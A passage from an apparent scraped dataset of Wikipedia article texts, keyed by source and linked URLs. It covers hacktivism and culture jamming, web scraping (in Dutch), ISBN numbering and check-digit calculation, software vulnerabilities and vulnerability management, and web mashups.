2022, that has committed a number of high profile cyber attacks, including attacks on NATO, 129 130 131 The Idaho National Laboratory, 127 128 and Real America's Voice. 132 133 On July 10, 2024, the group announced that they would be disbanding after attacking The Heritage Foundation. 134 SiegedSec is led by an individual under the alias "vio". 135 Short for "Sieged Security", 136 137 138 SiegedSec's Telegram channel was first created in April 2022, 139 and they commonly refer to themselves as "gay furry hackers". 140 141 On multiple occasions, the group has targeted right-wing movements through breaching data, including The Heritage Foundation, 142 143 Real America's Voice, 144 as well as various U.S. states that have pursued legislative decisions against gender-affirming care. 145 Hacking has been sometime described as a form of culture jamming. 146 : 88 This term refers to the practice of subverting and criticizing political messages as well as media culture with the aim of challenging the status quo. It is often targeted toward subliminal thought processes taking place in the viewers with the goal of raising awareness as well as causing a paradigm shift. Culture jamming takes many forms including billboard hacking, broadcast signal intrusion, ad hoc art performances, simulated legal transgressions, 147 memes, and artivism. citation needed 148 The term "culture jamming" was first coined in 1984 by American musician Donald Joyce of the band Negativland. 149 However, some speculation remains as to when the practice of culture jamming first began. Social researcher Vince Carducci believes culture jamming can be traced back to the 1950s with European social activist group Situationist International. Author and cultural critic Mark Dery believes medieval carnival is the earliest form of culture jamming as a way to subvert the social hierarchy at the time. citation needed Culture jamming is sometimes confused with acts of vandalism. However, unlike culture jamming, the main goal of vandalism is to cause destruction with any political themes being of lesser importance. Artivism usually has the most questionable nature as a form of culture jamming because defacement of property is usually involved. citation needed Media hacking refers to the usage of various electronic media in an innovative or otherwise abnormal fashion for the purpose of conveying a message to as large a number of people as possible, primarily achieved via the World Wide Web. 150 151 A popular and effective means of media hacking is posting on a blog, as one is usually controlled by one or more independent individuals, uninfluenced by outside parties. The concept of social bookmarking, as well as Web-based Internet forums, may cause such a message to be seen by users of other sites as well, increasing its total reach. Media hacking is commonly employed for political purposes, by both political parties and political dissidents. A good example of this is the 2008 US Election, in which both the Democratic and Republican parties used a wide variety of different media in order to convey relevant messages to an increasingly Internet-oriented audience. 152 At the same time, political dissidents used blogs and other social media like Twitter in order to reply on an individual basis to the presidential candidates. In particular, sites like Twitter are proving important means in gauging popular support for the candidates, though the site is often used for dissident purposes rather than a show of positive support. 153 Mobile technology has also become subject to media hacking for political purposes. SMS has been widely used by political dissidents as a means of quickly and effectively organising smart mobs for political action. This has been most effective in the Philippines, where SMS media hacking has twice had a significant impact on whether or not the country's Presidents are elected or removed from office. 154 Reality hacking is any phenomenon that emerges from the nonviolent use of illegal or legally ambiguous digital tools in pursuit of politically, socially, or culturally subversive ends. These tools include website defacements, URL redirections, denial-of-service attacks, information theft, web-site parodies, virtual sit-ins, and virtual sabotage. citation needed Art movements such as Fluxus and Happenings in the 1970s created a climate of receptibility in regard to loose-knit organizations and group activities where spontaneity, a return to primitivist behavior, and an ethics where activities and socially engaged art practices became tantamount to aesthetic concerns. clarification needed The conflation of these two histories in the mid-to-late 1990s citation needed resulted in cross-overs between virtual sit-ins, electronic civil disobedience, denial-of-service attacks, as well as mass protests in relation to groups like the International Monetary Fund and the World Bank. The rise of collectives, net.art groups, and those concerned with the fluid interchange of technology and real life (often from an environmental concern) gave birth to the practice of "reality hacking". Reality hacking relies on tweaking the everyday communications most easily available to individuals with the purpose of awakening the political and community conscience of the larger population. The term first came into use among New York and San Francisco artists, but has since been adopted by a school of political activists centered around culture jamming. The 1999 science fiction-action film The Matrix, among others, popularized the simulation hypothesis — the suggestion that reality is in fact a simulation of which those affected by the simulants are generally unaware. In this context, "reality hacking" is reading and understanding the code which represents the activity of the simulated reality environment (such as Matrix digital rain) and also modifying it in order to bend the laws of physics or otherwise modify the simulated reality. Reality hacking as a mystical practice is explored in the Gothic-Punk aesthetics-inspired White Wolf urban fantasy role-playing game Mage: The Ascension. In this game, the Reality Coders (also known as Reality Hackers or Reality Crackers) are a faction within the Virtual Adepts, a secret society of mages whose magick revolves around digital technology. They are dedicated to bringing the benefits of cyberspace to real space. To do this, they had to identify, for lack of a better term, the "source code" that allows our Universe to function. And that is what they have been doing ever since. Coders infiltrated a number of levels of society in order to gather the greatest compilation of knowledge ever seen. One of the Coders' more overt agendas is to acclimate the masses to the world that is to come. They spread Virtual Adept ideas through video games and a whole spate of "reality shows" that mimic virtual reality far more than "real" reality. The Reality Coders consider themselves the future of the Virtual Adepts, creating a world in the image of visionaries like Grant Morrison or Terence McKenna. citation needed In a location-based game (also known as a pervasive game), reality hacking refers to tapping into phenomena that exist in the real world, and tying them into the game story universe. 155 There have been various academic approaches to deal with hacktivism and urban hacking. In 2010, G nther Friesinger, Johannes Grenzfurthner and Thomas Ballhausen published an entire reader dedicated to the subject. They state: "Urban spaces became battlefields, signifiers have been invaded, new structures have been established: Netculture replaced counterculture in most parts and also focused on the everchanging environments of the modern city. Important questions have been brought up to date and reasked, taking current positions and discourses into account. The major question still remains, namely how to create culturally based resistance under the influence of capitalistic pressure and conservative politics. 156 |
465 | https://en.wikipedia.org/wiki/Web_scraping | https://nl.wikipedia.org/wiki/Scrapen | Scrapen (Engels: web scraping) is een computertechniek waarbij software wordt gebruikt om informatie van webpagina's te extraheren en al dan niet te analyseren. Meestal probeert de software een deel van het world wide web te onderzoeken via gebruik van het op codes gebaseerde Hypertext Transfer Protocol (HTTP), of door het surfgedrag met een webbrowser zoals Mozilla Firefox te simuleren. Scrapen is sterk gerelateerd aan web-indexering, waarmee een bot of een web-crawler op een automatische manier de informatie verzamelt en categoriseert, een techniek die universeel wordt toegepast door de meeste zoekmachines. Scrapen daarentegen focust zich vooral op de omzetting van ongestructureerde data, meestal in HTML-formaat, naar gestructureerde data die kan worden bewaard en geanalyseerd in een centrale lokale database of spreadsheet. Behalve door zoekmachines wordt de techniek ook vaak ingezet voor het vergaren van data wanneer de aanbieder ervan deze niet op een gestructureerde manier weggeeft of verkoopt, zoals met een API. Voorbeelden van scrapen zijn online prijsvergelijkingen, verzamelen van contactgegevens, nieuwsartikelen, monitoring van weergegevens, detectie van wijzigingen aan websites, onderzoek, web-mashup en webdata-integratie. In Europa werd in 2021 wetgeving aangenomen voor tekst- en datamining waar scraping een onderdeel van is. Deze is te vinden in artikelen 3 en 4 van de Europese richtlijn inzake auteursrechten en naburige rechten in de digitale eengemaakte markt. In de Nederlandse auteurswet zijn deze artikelen omgezet naar artikelen 15n en 15o. |
466 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/ISBN_(identifier) | The International Standard Book Number (ISBN) is a numeric commercial book identifier that is intended to be unique. a b Publishers purchase or receive ISBNs from an affiliate of the International ISBN Agency. 2 A different ISBN is assigned to each separate edition and variation of a publication, but not to a simple reprinting of an existing item. For example, an e-book, a paperback and a hardcover edition of the same book must each have a different ISBN, but an unchanged reprint of the hardcover edition keeps the same ISBN. The ISBN is ten digits long if assigned before 2007, and thirteen digits long if assigned on or after 1 January 2007. c The method of assigning an ISBN is nation-specific and varies between countries, often depending on how large the publishing industry is within a country. The first version of the ISBN identification format was devised in 1967, based upon the 9 digit Standard Book Numbering (SBN) created in 1966. The 10 digit ISBN format was developed by the International Organization for Standardization (ISO) and was published in 1970 as international standard ISO 2108 (any 9 digit SBN can be converted to a 10 digit ISBN by prefixing it with a zero). Privately published books sometimes appear without an ISBN. The International ISBN Agency sometimes assigns ISBNs to such books on its own initiative. 4 A separate identifier code of a similar kind, the International Standard Serial Number (ISSN), identifies periodical publications such as magazines and newspapers. The International Standard Music Number (ISMN) covers musical scores. The Standard Book Number (SBN) is a commercial system using nine-digit code numbers to identify books. In 1965, British bookseller and stationers WHSmith announced plans to implement a standard numbering system for its books. 1 They hired consultants to work on their behalf, and the system was devised by Gordon Foster, emeritus professor of statistics at Trinity College Dublin. 5 The International Organization for Standardization (ISO) Technical Committee on Documentation sought to adapt the British SBN for international use. The ISBN identification format was conceived in 1967 in the United Kingdom by David Whitaker 6 7 (regarded as the "Father of the ISBN") 8 and in 1968 in the United States by Emery Koltay 6 (who later became director of the U.S. ISBN agency R. R. Bowker). 8 9 10 The 10 digit ISBN format was developed by the ISO and was published in 1970 as international standard ISO 2108. 1 6 The United Kingdom continued to use the nine-digit SBN code until 1974. ISO has appointed the International ISBN Agency as the registration authority for ISBN worldwide and the ISBN Standard is developed under the control of ISO Technical Committee 46 Subcommittee 9 TC 46 SC 9. The ISO on-line facility only refers back to 1978. 11 An SBN may be converted to an ISBN by prefixing the digit "0". For example, the second edition of Mr. J. G. Reeder Returns, published by Hodder in 1965, has "SBN 340 01381 8", where "340" indicates the publisher, "01381" is the serial number assigned by the publisher, and "8" is the check digit. By prefixing a zero, this can be converted to ISBN 0 340 01381 8; the check digit does not need to be re-calculated. Some publishers, such as Ballantine Books, would sometimes use 12 digit SBNs where the last three digits indicated the price of the book; 12 for example, Woodstock Handmade Houses had a 12 digit Standard Book Number of 345 24223 8 595 (valid SBN: 345 24223 8, ISBN: 0 345 24223 8), 13 and it cost US$5.95. 14 Since 1 January 2007, ISBNs have contained thirteen digits, a format that is compatible with "Bookland" European Article Numbers, which have 13 digits. 3 The United States, with 3.9 million registered ISBNs in 2020, was by far the biggest user of the ISBN identifier in 2020, followed by the Republic of Korea (329,582), Germany (284,000), China (263,066), the UK (188,553) and Indonesia (144,793). Lifetime ISBNs registered in the United States are over 39 million as of 2020. 15 A separate ISBN is assigned to each edition and variation (except reprintings) of a publication. For example, an ebook, audiobook, paperback, and hardcover edition of the same book must each have a different ISBN assigned to it. 16 : 12 The ISBN is thirteen digits long if assigned on or after 1 January 2007, and ten digits long if assigned before 2007. c 3 An International Standard Book Number consists of four parts (if it is a 10 digit ISBN) or five parts (for a 13 digit ISBN). Section 5 of the International ISBN Agency's official user manual 16 : 11 describes the structure of the 13 digit ISBN, as follows: A 13 digit ISBN can be separated into its parts (prefix element, registration group, registrant, publication and check digit), and when this is done it is customary to separate the parts with hyphens or spaces. Separating the parts (registration group, registrant, publication and check digit) of a 10 digit ISBN is also done with either hyphens or spaces. Figuring out how to correctly separate a given ISBN is complicated, because most of the parts do not use a fixed number of digits. e ISBN issuance is country-specific, in that ISBNs are issued by the ISBN registration agency that is responsible for that country or territory regardless of the publication language. The ranges of ISBNs assigned to any particular country are based on the publishing profile of the country concerned, and so the ranges will vary depending on the number of books and the number, type, and size of publishers that are active. Some ISBN registration agencies are based in national libraries or within ministries of culture and thus may receive direct funding from the government to support their services. In other cases, the ISBN registration service is provided by organisations such as bibliographic data providers that are not government funded. 18 A full directory of ISBN agencies is available on the International ISBN Agency website. 19 A list for a few countries is given below: The ISBN registration group element is a 1 to 5 digit number that is valid within a single prefix element (i.e. one of 978 or 979), 16 : 11 and can be separated between hyphens, such as "978 1 ... . Registration groups have primarily been allocated within the 978 prefix element. 38 The single-digit registration groups within the 978 prefix element are: 0 or 1 for English-speaking countries; 2 for French-speaking countries; 3 for German-speaking countries; 4 for Japan; 5 for Russian-speaking countries; and 7 for People's Republic of China. Example 5 digit registration groups are 99936 and 99980, for Bhutan. The allocated registration groups are: 0 5, 600 631, 65, 7, 80 94, 950 989, 9910 9989, and 99901 99993. 39 Books published in rare languages typically have longer group elements. 40 Within the 979 prefix element, the registration group 0 is reserved for compatibility with International Standard Music Numbers (ISMNs), but such material is not actually assigned an ISBN. 41 The registration groups within prefix element 979 that have been assigned are 8 for the United States of America, 10 for France, 11 for the Republic of Korea, and 12 for Italy. 42 The original 9 digit standard book number (SBN) had no registration group identifier, but prefixing a zero to a 9 digit SBN creates a valid 10 digit ISBN. The national ISBN agency assigns the registrant element (cf. Category:ISBN agencies) and an accompanying series of ISBNs within that registrant element to the publisher; the publisher then allocates one of the ISBNs to each of its books. In most countries, a book publisher is not legally required to assign an ISBN, although most large bookstores only handle publications that have ISBNs assigned to them. 43 44 45 The International ISBN Agency maintains the details of over one million ISBN prefixes and publishers in the Global Register of Publishers. 46 This database is freely searchable over the internet. Publishers receive blocks of ISBNs, with larger blocks allotted to publishers expecting to need them; a small publisher may receive ISBNs of one or more digits for the registration group identifier, several digits for the registrant, and a single digit for the publication element. Once that block of ISBNs is used, the publisher may receive another block of ISBNs, with a different registrant element. Consequently, a publisher may have different allotted registrant elements. There also may be more than one registration group identifier used in a country. This might occur once all the registrant elements from a particular registration group have been allocated to publishers. By using variable block lengths, registration agencies are able to customise the allocations of ISBNs that they make to publishers. For example, a large publisher may be given a block of ISBNs where fewer digits are allocated for the registrant element and many digits are allocated for the publication element; likewise, countries publishing many titles have few allocated digits for the registration group identifier and many for the registrant and publication elements. 47 Here are some sample ISBN 10 codes, illustrating block length variations. English-language registration group elements are 0 and 1 (2 of more than 220 registration group elements). These two registration group elements are divided into registrant elements in a systematic pattern, which allows their length to be determined, as follows: 17 A check digit is a form of redundancy check used for error detection, the decimal equivalent of a binary check bit. It consists of a single digit computed from the other digits in the number. The method for the 10 digit ISBN is an extension of that for SBNs, so the two systems are compatible; an SBN prefixed with a zero (the 10 digit ISBN) will give the same check digit as the SBN without the zero. The check digit is base eleven, and can be an integer between 0 and 9, or an 'X'. The system for 13 digit ISBNs is not compatible with SBNs and will, in general, give a different check digit from the corresponding 10 digit ISBN, so does not provide the same protection against transposition. This is because the 13 digit code was required to be compatible with the EAN format, and hence could not contain the letter 'X'. According to the 2001 edition of the International ISBN Agency's official user manual, 48 the ISBN 10 check digit (which is the last digit of the 10 digit ISBN) must range from 0 to 10 (the symbol 'X' is used for 10), and must be such that the sum of the ten digits, each multiplied by its (integer) weight, descending from 10 to 1, is a multiple of 11. That is, if xi is the ith digit, then x10 must be chosen such that: For example, for an ISBN 10 of 0 306 40615 2: Formally, using modular arithmetic, this is rendered It is also true for ISBN 10s that the sum of all ten digits, each multiplied by its weight in ascending order from 1 to 10, is a multiple of 11. For this example: Formally, this is rendered The two most common errors in handling an ISBN (e.g. when typing it or writing it down) are a single altered digit or the transposition of adjacent digits. It can be proven mathematically that all pairs of valid ISBN 10s differ in at least two digits. It can also be proven that there are no pairs of valid ISBN 10s with eight identical digits and two transposed digits (these proofs are true because the ISBN is less than eleven digits long and because 11 is a prime number). The ISBN check digit method therefore ensures that it will always be possible to detect these two most common types of error, i.e., if either of these types of error has occurred, the result will never be a valid ISBN—the sum of the digits multiplied by their weights will never be a multiple of 11. However, if the error were to occur in the publishing house and remain undetected, the book would be issued with an invalid ISBN. 49 In contrast, it is possible for other types of error, such as two altered non-transposed digits, or three altered digits, to result in a valid ISBN (although it is still unlikely). Each of the first nine digits of the 10 digit ISBN—excluding the check digit itself—is multiplied by its (integer) weight, descending from 10 to 2, and the sum of these nine products found. The value of the check digit is simply the one number between 0 and 10 which, when added to this sum, means the total is a multiple of 11. For example, the check digit for an ISBN 10 of 0 306 40615 ? is calculated as follows: Adding 2 to 130 gives a multiple of 11 (because 132 12 11)—this is the only number between 0 and 10 which does so. Therefore, the check digit has to be 2, and the complete sequence is ISBN 0 306 40615 2. If the value of x 10 displaystyle x 10 required to satisfy this condition is 10, then an 'X' should be used. Alternatively, modular arithmetic is convenient for calculating the check digit using modulus 11. The remainder of this sum when it is divided by 11 (i.e. its value modulo 11), is computed. This remainder plus the check digit must equal either 0 or 11. Therefore, the check digit is (11 minus the remainder of the sum of the products modulo 11) modulo 11. Taking the remainder modulo 11 a second time accounts for the possibility that the first remainder is 0. Without the second modulo operation, the calculation could result in a check digit value of 11 0 11, which is invalid. (Strictly speaking, the first "modulo 11" is not needed, but it may be considered to simplify the calculation.) For example, the check digit for the ISBN of 0 306 40615 ? is calculated as follows: Thus the check digit is 2. It is possible to avoid the multiplications in a software implementation by using two accumulators. Repeatedly adding t into s computes the necessary multiples: The modular reduction can be done once at the end, as shown above (in which case s could hold a value as large as 496, for the invalid ISBN 99999 999 9 X), or s and t could be reduced by a conditional subtract after each addition. Appendix 1 of the International ISBN Agency's official user manual 16 : 33 describes how the 13 digit ISBN check digit is calculated. The ISBN 13 check digit, which is the last digit of the ISBN, must range from 0 to 9 and must be such that the sum of all the thirteen digits, each multiplied by its (integer) weight, alternating between 1 and 3, is a multiple of 10. As ISBN 13 is a subset of EAN 13, the algorithm for calculating the check digit is exactly the same for both. Formally, using modular arithmetic, this is rendered: The calculation of an ISBN 13 check digit begins with the first twelve digits of the 13 digit ISBN (thus excluding the check digit itself). Each digit, from left to right, is alternately multiplied by 1 or 3, then those products are summed modulo 10 to give a value ranging from 0 to 9. Subtracted from 10, that leaves a result from 1 to 10. A zero replaces a ten, so, in all cases, a single check digit results. For example, the ISBN 13 check digit of 978 0 306 40615 ? is calculated as follows: Thus, the check digit is 7, and the complete sequence is ISBN 978 0 306 40615 7. In general, the ISBN check digit is calculated as follows. Let Then This check system—similar to the UPC check digit formula—does not catch all errors of adjacent digit transposition. Specifically, if the difference between two adjacent digits is 5, the check digit will not catch their transposition. For instance, the above example allows this situation with the 6 followed by a 1. The correct order contributes 3 6 1 1 19 to the sum; while, if the digits are transposed (1 followed by a 6), the contribution of those two digits will be 3 1 1 6 9. However, 19 and 9 are congruent modulo 10, and so produce the same, final result: both ISBNs will have a check digit of 7. The ISBN 10 formula uses the prime modulus 11 which avoids this blind spot, but requires more than the digits 0 9 to express the check digit. Additionally, if the sum of the 2nd, 4th, 6th, 8th, 10th, and 12th digits is tripled then added to the remaining digits (1st, 3rd, 5th, 7th, 9th, 11th, and 13th), the total will always be divisible by 10 (i.e., end in 0). A 10 digit ISBN is converted to a 13 digit ISBN by prepending "978" to the ISBN 10 and recalculating the final checksum digit using the ISBN 13 algorithm. The reverse process can also be performed, but not for numbers commencing with a prefix other than 978, which have no 10 digit equivalent. Publishers and libraries have varied policies about the use of the ISBN check digit. Publishers sometimes fail to check the correspondence of a book title and its ISBN before publishing it; that failure causes book identification problems for libraries, booksellers, and readers. 50 For example, ISBN 0 590 76484 5 is shared by two books—Ninja gaiden: a novel based on the best-selling game by Tecmo (1990) and Wacky laws (1997), both published by Scholastic. Most libraries and booksellers display the book record for an invalid ISBN issued by the publisher. The Library of Congress catalogue contains books published with invalid ISBNs, which it usually tags with the phrase "Cancelled ISBN". 51 The International Union Library Catalog (a.k.a., WorldCat OCLC—Online Computer Library Center system) often indexes by invalid ISBNs, if the book is indexed in that way by a member library. 52 Only the term "ISBN" should be used; the terms "eISBN" and "e-ISBN" have historically been sources of confusion and should be avoided. If a book exists in one or more digital (e-book) formats, each of those formats must have its own ISBN. In other words, each of the three separate EPUB, Amazon Kindle, and PDF formats of a particular book will have its own specific ISBN. They should not share the ISBN of the paper version, and there is no generic "eISBN" which encompasses all the e-book formats for a title. 53 The barcodes on a book's back cover (or inside a mass-market paperback book's front cover) are EAN 13; they may have a separate barcode encoding five digits called an EAN 5 for the currency and the recommended retail price. 54 For 10 digit ISBNs, the number "978", the Bookland "country code", is prefixed to the ISBN in the barcode data, and the check digit is recalculated according to the EAN 13 formula (modulo 10, 1 and 3 weighting on alternating digits). Partly because of an expected shortage in certain ISBN categories, the International Organization for Standardization (ISO) decided to migrate to a 13 digit ISBN (ISBN 13). The process began on 1 January 2005 and was planned to conclude on 1 January 2007. 55 As of 2011 update , all the 13 digit ISBNs began with 978. As the 978 ISBN supply is exhausted, the 979 prefix was introduced. Part of the 979 prefix is reserved for use with the Musicland code for musical scores with an ISMN. The 10 digit ISMN codes differed visually as they began with an "M" letter; the bar code represents the "M" as a zero, and for checksum purposes it counted as a 3. All ISMNs are now thirteen digits commencing 979 0; 979 1 to 979 9 will be used by ISBN. Publisher identification code numbers are unlikely to be the same in the 978 and 979 ISBNs, likewise, there is no guarantee that language area code numbers will be the same. Moreover, the 10 digit ISBN check digit generally is not the same as the 13 digit ISBN check digit. Because the GTIN 13 is part of the Global Trade Item Number (GTIN) system (that includes the GTIN 14, the GTIN 12, and the GTIN 8), the 13 digit ISBN falls within the 14 digit data field range. 56 Barcode format compatibility is maintained, because (aside from the group breaks) the ISBN 13 barcode format is identical to the EAN barcode format of existing 10 digit ISBNs. So, migration to an EAN-based system allows booksellers the use of a single numbering system for both books and non-book products that is compatible with existing ISBN based data, with only minimal changes to information technology systems. Hence, many booksellers (e.g., Barnes Noble) migrated to EAN barcodes as early as March 2005. Although many American and Canadian booksellers were able to read EAN 13 barcodes before 2005, most general retailers could not read them. The upgrading of the UPC barcode system to full EAN 13, in 2005, eased migration to the ISBN in North America. |
467 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Vulnerability_(computing) | Vulnerabilities are flaws in a computer system that weaken the overall security of the system. Despite intentions to achieve complete correctness, virtually all hardware and software contains bugs where the system does not behave as expected. If the bug could enable an attacker to compromise the confidentiality, integrity, or availability of system resources, it is called a vulnerability. Insecure software development practices as well as design factors such as complexity can increase the burden of vulnerabilities. There are different types most common in different components such as hardware, operating systems, and applications. Vulnerability management is a process that includes identifying systems and prioritizing which are most important, scanning for vulnerabilities, and taking action to secure the system. Vulnerability management typically is a combination of remediation (fixing the vulnerability), mitigation (increasing the difficulty or reducing the danger of exploits), and accepting risks that are not economical or practical to eliminate. Vulnerabilities can be scored for risk according to the Common Vulnerability Scoring System or other systems, and added to vulnerability databases. As of 2023 update , there are more than 20 million vulnerabilities catalogued in the Common Vulnerabilities and Exposures (CVE) database. A vulnerability is initiated when it is introduced into hardware or software. It becomes active and exploitable when the software or hardware containing the vulnerability is running. The vulnerability may be discovered by the vendor or a third party. Disclosing the vulnerability (as a patch or otherwise) is associated with an increased risk of compromise because attackers often move faster than patches are rolled out. Regardless of whether a patch is ever released to remediate the vulnerability, its lifecycle will eventually end when the system, or older versions of it, fall out of use. Despite developers' goal of delivering a product that works entirely as intended, virtually all software and hardware contains bugs. 1 If a bug creates a security risk, it is called a vulnerability. 2 3 4 Software patches are often released to fix identified vulnerabilities, but those that remain unknown (zero days) as well as those that have not been patched are still liable for exploitation. 5 Vulnerabilities vary in their ability to be exploited by malicious actors, 2 and the actual risk is dependent on the nature of the vulnerability as well as the value of the surrounding system. 6 Although some vulnerabilities can only be used for denial of service attacks, more dangerous ones allow the attacker to inject and run their own code (called malware), without the user being aware of it. 2 Only a minority of vulnerabilities allow for privilege escalation, which is necessary for more severe attacks. 7 Without a vulnerability, the exploit cannot gain access. 8 It is also possible for malware to be installed directly, without an exploit, if the attacker uses social engineering or implants the malware in legitimate software that is downloaded deliberately. 9 Fundamental design factors that can increase the burden of vulnerabilities include: Some software development practices can affect the risk of vulnerabilities being introduced to a code base. Lack of knowledge about secure software development or excessive pressure to deliver features quickly can lead to avoidable vulnerabilities to enter production code, especially if security is not prioritized by the company culture. This can lead to unintended vulnerabilities. The more complex the system is, the easier it is for vulnerabilities to go undetected. Some vulnerabilities are deliberately planted, which could be for any reason from a disgruntled employee selling access to hackers, to sophisticated state-sponsored schemes to introduce vulnerabilities to software. 14 Inadequate code reviews can lead to missed bugs, but there are also static code analysis tools that can be used as part of code reviews and may find some vulnerabilities. 15 DevOps, a development workflow that emphasizes automated testing and deployment to speed up the deployment of new features, often requires that many developers be granted access to change configurations, which can lead to deliberate or inadvertent inclusion of vulnerabilities. 16 Compartmentalizing dependencies, which is often part of DevOps workflows, can reduce the attack surface by paring down dependencies to only what is necessary. 17 If software as a service is used, rather than the organization's own hardware and software, the organization is dependent on the cloud services provider to prevent vulnerabilities. 18 The National Vulnerability Database classifies vulnerabilities into eight root causes that may be overlapping, including: 19 Deliberate security bugs can be introduced during or after manufacturing and cause the integrated circuit not to behave as expected under certain specific circumstances. Testing for security bugs in hardware is quite difficult due to limited time and the complexity of twenty-first century chips, 22 while the globalization of design and manufacturing has increased the opportunity for these bugs to be introduced by malicious actors. 23 Although operating system vulnerabilities vary depending on the operating system in use, a common problem is privilege escalation bugs that enable the attacker to gain more access than they should be allowed. Open-source operating systems such as Linux and Android have a freely accessible source code and allow anyone to contribute, which could enable the introduction of vulnerabilities. However, the same vulnerabilities also occur in proprietary operating systems such as Microsoft Windows and Apple operating systems. 24 All reputable vendors of operating systems provide patches regularly. 25 Client server applications are downloaded onto the end user's computers and are typically updated less frequently than web applications. Unlike web applications, they interact directly with a user's operating system. Common vulnerabilities in these applications include: 26 Web applications run on many websites. Because they are inherently less secure than other applications, they are a leading source of data breaches and other security incidents. 27 28 Common types of vulnerabilities found in these applications include: There is little evidence about the effectiveness and cost-effectiveness of different cyberattack prevention measures. 31 Although estimating the risk of an attack is not straightforward, the mean time to breach and expected cost can be considered to determine the priority for remediating or mitigating an identified vulnerability and whether it is cost effective to do so. 32 Although attention to security can reduce the risk of attack, achieving perfect security for a complex system is impossible, and many security measures have unacceptable cost or usability downsides. 33 For example, reducing the complexity and functionality of the system is effective at reducing the attack surface. 34 Successful vulnerability management usually involves a combination of remediation (closing a vulnerability), mitigation (increasing the difficulty, and reducing the consequences, of exploits), and accepting some residual risk. Often a defense in depth strategy is used for multiple barriers to attack. 35 Some organizations scan for only the highest-risk vulnerabilities as this enables prioritization in the context of lacking the resources to fix every vulnerability. 36 Increasing expenses is likely to have diminishing returns. 32 Remediation fixes vulnerabilities, for example by downloading a software patch. 37 Software vulnerability scanners are typically unable to detect zero-day vulnerabilities, but are more effective at finding known vulnerabilities based on a database. These systems can find some known vulnerabilities and advise fixes, such as a patch. 38 39 However, they have limitations including false positives. 37 Vulnerabilities can only be exploited when they are active-the software in which they are embedded is actively running on the system. 40 Before the code containing the vulnerability is configured to run on the system, it is considered a carrier. 41 Dormant vulnerabilities can run, but are not currently running. Software containing dormant and carrier vulnerabilities can sometimes be uninstalled or disabled, removing the risk. 42 Active vulnerabilities, if distinguished from the other types, can be prioritized for patching. 40 Vulnerability mitigation is measures that do not close the vulnerability, but make it more difficult to exploit or reduce the consequences of an attack. 43 Reducing the attack surface, particularly for parts of the system with root (administrator) access, and closing off opportunities for exploits to engage in privilege exploitation is a common strategy for reducing the harm that a cyberattack can cause. 37 If a patch for third-party software is unavailable, it may be possible to temporarily disable the software. 44 A penetration test attempts to enter the system via an exploit to see if the system is insecure. 45 If a penetration test fails, it does not necessarily mean that the system is secure. 46 Some penetration tests can be conducted with automated software that tests against existing exploits for known vulnerabilities. 47 Other penetration tests are conducted by trained hackers. Many companies prefer to contract out this work as it simulates an outsider attack. 46 The vulnerability lifecycle begins when vulnerabilities are introduced into hardware or software. 48 Detection of vulnerabilities can be by the software vendor, or by a third party. In the latter case, it is considered most ethical to immediately disclose the vulnerability to the vendor so it can be fixed. 49 Government or intelligence agencies buy vulnerabilities that have not been publicly disclosed and may use them in an attack, stockpile them, or notify the vendor. 50 As of 2013, the Five Eyes (United States, United Kingdom, Canada, Australia, and New Zealand) captured the plurality of the market and other significant purchasers included Russia, India, Brazil, Malaysia, Singapore, North Korea, and Iran. 51 Organized criminal groups also buy vulnerabilities, although they typically prefer exploit kits. 52 Even vulnerabilities that are publicly known or patched are often exploitable for an extended period. 53 54 Security patches can take months to develop, 55 or may never be developed. 54 A patch can have negative effects on the functionality of software 54 and users may need to test the patch to confirm functionality and compatibility. 56 Larger organizations may fail to identify and patch all dependencies, while smaller enterprises and personal users may not install patches. 54 Research suggests that risk of cyberattack increases if the vulnerability is made publicly known or a patch is released. 57 Cybercriminals can reverse engineer the patch to find the underlying vulnerability and develop exploits, 58 often faster than users install the patch. 57 Vulnerabilities become deprecated when the software or vulnerable versions fall out of use. 49 This can take an extended period of time; in particular, industrial software may not be feasible to replace even if the manufacturer stops supporting it. 59 A commonly used scale for assessing the severity of vulnerabilities is the open-source specification Common Vulnerability Scoring System (CVSS). CVSS evaluates the possibility to exploit the vulnerability and compromise data confidentiality, availability, and integrity. It also considers how the vulnerability could be used and how complex an exploit would need to be. The amount of access needed for exploitation and whether it could take place without user interaction are also factored in to the overall score. 60 61 Someone who discovers a vulnerability may disclose it immediately (full disclosure) or wait until a patch has been developed (responsible disclosure, or coordinated disclosure). The former approach is praised for its transparency, but the drawback is that the risk of attack is likely to be increased after disclosure with no patch available. 62 Some vendors pay bug bounties to those who report vulnerabilities to them. 63 64 Not all companies respond positively to disclosures, as they can cause legal liability and operational overhead. 65 There is no law requiring disclosure of vulnerabilities. 66 If a vulnerability is discovered by a third party that does not disclose to the vendor or the public, it is called a zero-day vulnerability, often considered the most dangerous type because fewer defenses exist. 67 The most commonly used vulnerability dataset is Common Vulnerabilities and Exposures (CVE), maintained by Mitre Corporation. 68 As of 2023 update , it has over 20 million entries. 38 This information is shared into other databases, including the United States' National Vulnerability Database, 68 where each vulnerability is given a risk score using Common Vulnerability Scoring System (CVSS), Common Platform Enumeration (CPE) scheme, and Common Weakness Enumeration. citation needed CVE and other databases typically do not track vulnerabilities in software as a service products. 38 Submitting a CVE is voluntary for companies that discovered a vulnerability. 66 The software vendor is usually not legally liable for the cost if a vulnerability is used in an attack, which creates an incentive to make cheaper but less secure software. 69 Some companies are covered by laws, such as PCI, HIPAA, and Sarbanes-Oxley, that place legal requirements on vulnerability management. 70 |
468 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Mashup_(web_application_hybrid) | A mashup (computer industry jargon), in web development, is a web page or web application that uses content from more than one source to create a single new service displayed in a single graphical interface. For example, a user could combine the addresses and photographs of their library branches with a Google map to create a map mashup. 1 The term implies easy, fast integration, frequently using open application programming interfaces (open API) and data sources to produce enriched results that were not necessarily the original reason for producing the raw source data. The term mashup originally comes from creating something by combining elements from two or more sources. 2 The main characteristics of a mashup are combination, visualization, and aggregation. It is important to make existing data more useful, for personal and professional use. To be able to permanently access the data of other services, mashups are generally client applications or hosted online. In the past years when? , more and more Web applications have published APIs that enable software developers to easily integrate data and functions the SOA way, instead of building them by themselves. Mashups can be considered to have an active role in the evolution of social software and Web 2.0. Mashup composition tools are usually simple enough to be used by end-users. They generally do not require programming skills and rather support visual wiring of GUI widgets, services and components together. Therefore, these tools contribute to a new vision of the Web, where users are able to contribute. clarification needed The term "mashup" is not formally defined by any standard-setting body. 3 The broader context of the history of the Web provides a background for the development of mashups. Under the Web 1.0 model, organizations stored consumer 